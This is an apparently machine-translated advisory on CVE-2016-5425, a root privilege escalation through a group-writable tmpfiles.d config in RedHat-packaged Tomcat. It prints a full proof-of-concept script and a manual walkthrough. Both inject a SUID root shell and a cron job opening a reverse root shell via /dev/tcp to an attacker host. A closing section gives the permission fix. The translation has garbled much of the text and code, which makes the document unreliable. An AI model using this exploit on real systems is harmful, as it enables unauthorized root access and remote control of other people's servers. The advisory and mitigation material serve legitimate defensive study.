Apache Tomcat local power-up vulnerability based on Redhat release

Describe

Tomcat has been trying to get some big news recently, one months have not arrived, and Tomcat burst out Loopholes. October 11, 2016, The online issue of Tomcat local rights to exploit the vulnerability number cve-2016-5425. The main impact was based on the RedHat distribution Apache Tomcat, including Centos,redhat,oraclelinux,fedora and so On. The main reason is that the normal tomcat user has permissions to read and write to the/usr/lib/tmpfiles.d/tomcat.conf profile, then the user group members or Webshell with normal tomcat privileges can elevate the permissions to the root level.

Vulnerability description

After a Tomcat installation based on the Redhat release, the Tomcat group user has write access to the tomcat.conf file, as follows

[[email protected] ~]# ls -al /usr/lib/tmpfiles.d/tomcat.conf -rw-rw-r--. 1 root tomcat 43 May 12  2015 /usr/lib/tmpfiles.d/tomcat.conf

The configuration file under the TMPFILES.D directory is systemd-tmpfiles for managing temporary files, and attackers can easily inject malicious payload into tomcat.conf files, such as creating a new bounce shell and creating a new file with Suid Permissions. When The/usr/bin/systemd-tmpfiles executes, the injected payload will be executed as Well.

In the Redhat release, after the default startup, systemd-tmpfiles will be executed via the Systemd-tmpfiles-setup.service service, as Follows:

[[email protected] www]# cat /usr/lib/systemd/system/systemd-tmpfiles-setup.service |grep ExecStartExecStart=/usr/bin/systemd-tmpfiles --create --remove --boot --exclude-prefix=/dev

Depending on the use of the system, Systemd-tmpfiles can also be triggered by other services, cronjobs, startup scripts, and so On. Another place to note is that Systemd-tmpfiles does not stop error due to syntax errors in the configuration File. As a result, attackers can easily inject malicious payload into/usr/lib/tmpfiles.d/tomcat.conf

According to the POC below, we can see that • is injected into the tomcat.conf, meaning to bounce the shell, and create a new shell with suid permissions, specifically c,z,f meaning, we can see through the man 5 TMPFILES.D.

/usr/share/tomcat/rootsh 4770 root root - /bin/bashz /usr/share/tomcat/rootsh 4770 root root -F /etc/cron.d/tomcatexploit 0644 root root - "* * * * * root nohup bash -i >/dev/tcp/$ATTACKER_IP/$ATTACKER_PORT 0<&1 2>&1

Poc

-----------[tomcat-rh-root.sh]---------#!/bin/bash# Apache Tomcat packaging on redhat-based distros-root Privilege escalation PoC Exploit# cve-2016-5425## Full Advisory At:# http://legalhackers.com/advisories/Tomcat-RedHat-Pkgs-Root-PrivEsc-Exploit-CVE-2016-5425.html## Discovered and coded by:# Dawid Golunski# http://legalhackers.com## tested on RedHat, CentOS, oraclelinux, Fedora systems.## for testing purposes Only.# attacker_ip=127.0.0.1attacker_port=9090Echo-e"\n* Apache Tomcat (RedHat distros)-Root privesc PoC cve-2016-5425 *"Echo-e"discovered by Dawid golunski\n"Echo"[+] Checking vulnerability" ls-l/usr/lib/tmpfiles.d/tomcat.conf | Grep' Tomcat 'If [$?-ne 0];ThenEcho"not vulnerable or Tomcat installed under a different user than ' Tomcat '"Exit 1FiEcho-e"\n[+] Your System is vulnerable!"Echo-e"\n[+] appending data to/usr/lib/tmpfiles.d/tomcat.conf ..." cat<<_eof_>>/usr/lib/tmpfiles.d/ Tomcat.confc/usr/share/tomcat/rootsh 4770 root root-/bin/bashz/usr/share/tomcat/rootsh 4770 root root-f/etc/cron.d/t Omcatexploit 0644 Root root-"* * * * * * root nohup bash-i >/dev/tcp/$ATTACKER _ip/$ATTACKER _port 0<&1 2>&1 & \ n "_eof_ echo " [+]/usr/lib/tmpfiles.d/tomcat.conf contains : "cat/usr/lib/tmpfiles.d/tomcat.confecho- e " \n[+] Payload injected! Wait for your root shell...\n "echo  -e" Once '/usr/bin/systemd-tmpfiles--create ' gets executed (on reboot by T mpfiles-setup.service, by cron, by another service etc), the Rootshell would be created In/usr/share/tomcat/rootsh. additionally, a reverse shell should get executed by Crond shortly after and connect to $ATTACKER _ip:$ATTACKER _po RT \ n "--------------[eof]--------------------          

Local testing:

1. First determine the local Linux distribution and the Tomcat Version.

2. Switch to the Tomcat group permission, attach the malicious payload to the/usr/lib/tmpfiles.d/tomcat.conf file

cat<<_eof_>>/usr/lib/tmpfiles.d/tomcat.confF /etc/cron.d/tomcatexploit 0644 root root - "* * * * * root nohup bash -i >/dev/tcp/192.168.1.3/9999 0<&1 2>&1 & \n\n"_eof_

3.root permission to manually trigger/usr/bin/systemd-tmpfiles–create [this step compared to the chicken, relying on the system has other services, cronjobs, boot script trigger, if the system has, then good, if not, this vulnerability relative use, Need to trigger systemd-tmpfiles, a little chicken]

[[email protected] Desktop]# /usr/bin/systemd-tmpfiles --create

4. Get the shell with bounce root permission

Vulnerability impact

An attacker can use the overwrite configuration file to implement local rights to root permissions when they have Tomcat Privileges. Remote attackers can also be exploited remotely if they are combined with a specific Web application Vulnerability.

The affected version

centosfedoraoracle Linuxredhat

Redhat official website Details: https://access.redhat.com/security/cve/CVE-2016-5425

Workaround Temporary Fix recommendations

You can adjust the/usr/lib/tmpfiles.d/tomcat.conf permissions to remove the Write permissions for the Tomcat Group.

chmod 644  /usr/lib/tmpfiles.d/tomcat.conf

Update the latest Tomcat package

The Redhat security team has already repaired the affected Tomcat upstream package for the first time, updating the Tomcat available directly from the release Version.

Reference

Http://legalhackers.com/advisories/Tomcat-RedHat-Pkgs-Root-PrivEsc-Exploit-CVE-2016-5425.html

http://legalhackers.com/exploits/tomcat-RH-root.sh

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5425

https://access.redhat.com/security/cve/CVE-2016-5425

Http://bobao.360.cn/learning/detail/3090.html

Apache Tomcat local power-up vulnerability based on Redhat release